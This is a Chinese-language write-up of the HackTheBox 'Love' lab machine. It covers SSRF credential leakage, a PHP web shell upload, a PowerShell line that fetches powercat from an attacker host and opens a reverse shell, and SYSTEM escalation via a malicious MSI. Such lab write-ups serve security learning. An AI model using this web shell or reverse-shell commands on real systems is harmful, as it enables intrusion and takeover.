IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> HTB-Love -> 正文阅读

[PHP知识库]HTB-Love

在这里插入图片描述

信息收集

在这里插入图片描述
咋一看很多,总结一下和http有关的。

  • 80 http open
  • 443 https open 403
  • 5000 http open 403
  • 5986 https open 404
  • 47001 http open 404

那就先看看80端口。
在这里插入图片描述
用sqlmap尝试一下。
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

密码是$2y$开头Blowfish,缺少加密密码。

在这里插入图片描述

本以为这个投票系统是随便取的名字,但是无法绕过登录,也没有登陆凭证。

在这里插入图片描述

所以再次收集信息,看起来很多但是没有登陆能利用的很少。
在这里插入图片描述
wfuzz没有发现这种类型的域名。
在这里插入图片描述
使用gobuster vhost能发现staging.love.htb
在这里插入图片描述
打开又是一个登录界面,抓包后发现只是个摆设。
在这里插入图片描述
继续查看Demo内容。随便上传了个文件,发现它会打印文件内的内容。

在这里插入图片描述
但是上传php代码就没有反应,可能是在服务端执行了但没有回显,也可能是被拦截(请原谅我此处忘记了目标是windows)。

在这里插入图片描述
但是我无意间输入的值,却有意想不到的收获。
在这里插入图片描述
emm不知道有啥文件,下下策就是暴力猜测文档名,还记得前面扫描出来一堆开启的与http有关的端口么。

  • 443 https open 403
  • 5000 http open 403
  • 5986 https open 404
  • 47001 http open 404

127.0.0.1:5000发现了admin:@LoveIsInTheAir!!!!,其他端口没有发现其他东西。
在这里插入图片描述
但是这个凭证,我试了几种方法都没办法在Voting System里面登录,不知道是不是密码两边的空格是只是为了格式。

在这里插入图片描述
很奇怪,明明前面测试admin是存在的用户,但是现在又不在了。在这里插入图片描述
与此同时还有一个玩家也在,会不会是对方的小恶作剧呢。

在这里插入图片描述
等待只有我一个玩家的时候重置目标,结果还是找不到对应投票人,一下给我整不会了。难不成普通投票人和管理员登陆的网站都不一样?唉不是吧还真是这样。

仔细看voter‘s id变成了username。

使用admin:@LoveIsInTheAir!!!!登陆成功。

在这里插入图片描述

开机

登陆进去能看到在voter界面有一个新建voter的功能,并且能够上传一个图片作为图像。

在这里插入图片描述
于是创建了个用户并且给予了一个头像,想看看头像在那个位置存放着。

在这里插入图片描述
在/images/路径找到。

在这里插入图片描述
上传了一个phpinfo文件上去并且被执行了。
在这里插入图片描述
上传恶意php。

<?php system($_REQUEST['cmd']); ?>

使用powercat

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6/powercat.ps1'); powercat -c 10.10.14.6 -p 8888 -e cmd

在这里插入图片描述

提权

使用powershell获取winPEAS.bat来搜集信息。

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.9/winPEAS.bat', 'winPEAS.bat')"

然后看到了这个,提示很到位了。
在这里插入图片描述

下一步自然是生成msi文件。
在这里插入图片描述
通过python和powershell获取。

在这里插入图片描述

并且可以在HackTricks找到对应安装方法。
在这里插入图片描述

配置错误的原因会导致的问题也有所描述,我们可以以SYSTEM的用户来安装并执行.msi文件,所以我们得以SYSTEM用户弹反。
在这里插入图片描述
先开启nc端口等待反弹,通过msiexec /quiet /qn /i C:\Users\Phoebe\Desktop\shell.msi安装.msi文件。
在这里插入图片描述

补充

比较让我在意的是前期nmap扫描有SSL证书。
在这里插入图片描述
于是在这次访问443端口的时候选择查看证书。
在这里插入图片描述

有发现什么吗?
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-10-31 11:33:57  更:2022-10-31 11:35:15 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 0:01:34-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码